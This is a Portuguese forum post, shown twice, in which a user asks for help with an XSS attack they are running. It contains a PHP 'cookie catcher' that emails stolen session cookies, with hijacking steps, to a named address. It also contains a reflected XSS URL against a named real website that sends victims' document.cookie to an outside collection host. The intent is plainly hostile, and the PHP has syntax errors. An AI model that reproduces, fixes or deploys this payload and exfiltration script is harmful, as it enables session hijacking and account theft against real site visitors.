Eai galera,
estou com uma duvida quando vou atacar por XSS.
Eu tenho este código:
<?php
if(($_GET['cookie'] == "")||($_GET['location'] == ""))
{
//no action needed
}
else
{
$cookie=$_GET['cookie'];
$location=$_GET['location'];
$stolencookies = " Abra o Browser: "'" . $location . "';
\r\n Definir o cookie: javascript:document.cookie='". $cookie . "';
\r\n Sequestrar a sessão!: '" . $location . "';
$Name = "Another Victim";
$email = "danilo.m.ga@hotmail.com";
$recipeint = "danilo.danklis@gmail.com";
$mail_body = $stolencookies;
$subject = "Another One Bites The Dust - ". $location;
$header = "From: ". $Name . " <" . $email . ">\r\n";
$mail($recipeint, $subject, $mail_body, $header);
}
?>
pelo o que eu sei, quando a vítima entra nessa página que contém esse código, sua sessão é roubada e tinha q ser enviado um e-mail pra mim, certo? Daí o código q eu mando pra vítima é esse:
http://oficinadanet.com.br/index.php?acao=search&cx=partner-pub-2027587876771817%3Ad499rz2p454&cof=FORID%3A10&ie=I SO-8859-1&q=<script>document.location="http://siteteste.x90x.net/cookiecatcher.php?cookie="+document.cookie+"&locat ion="+document.location;</script>
nao sei se esta ceto, mas alguém poderia me dar uma luz??
estou com uma duvida quando vou atacar por XSS.
Eu tenho este código:
<?php
if(($_GET['cookie'] == "")||($_GET['location'] == ""))
{
//no action needed
}
else
{
$cookie=$_GET['cookie'];
$location=$_GET['location'];
$stolencookies = " Abra o Browser: "'" . $location . "';
\r\n Definir o cookie: javascript:document.cookie='". $cookie . "';
\r\n Sequestrar a sessão!: '" . $location . "';
$Name = "Another Victim";
$email = "danilo.m.ga@hotmail.com";
$recipeint = "danilo.danklis@gmail.com";
$mail_body = $stolencookies;
$subject = "Another One Bites The Dust - ". $location;
$header = "From: ". $Name . " <" . $email . ">\r\n";
$mail($recipeint, $subject, $mail_body, $header);
}
?>
pelo o que eu sei, quando a vítima entra nessa página que contém esse código, sua sessão é roubada e tinha q ser enviado um e-mail pra mim, certo? Daí o código q eu mando pra vítima é esse:
http://oficinadanet.com.br/index.php?acao=search&cx=partner-pub-2027587876771817%3Ad499rz2p454&cof=FORID%3A10&ie=I SO-8859-1&q=<script>document.location="http://siteteste.x90x.net/cookiecatcher.php?cookie="+document.cookie+"&locat ion="+document.location;</script>
nao sei se esta ceto, mas alguém poderia me dar uma luz??
Comment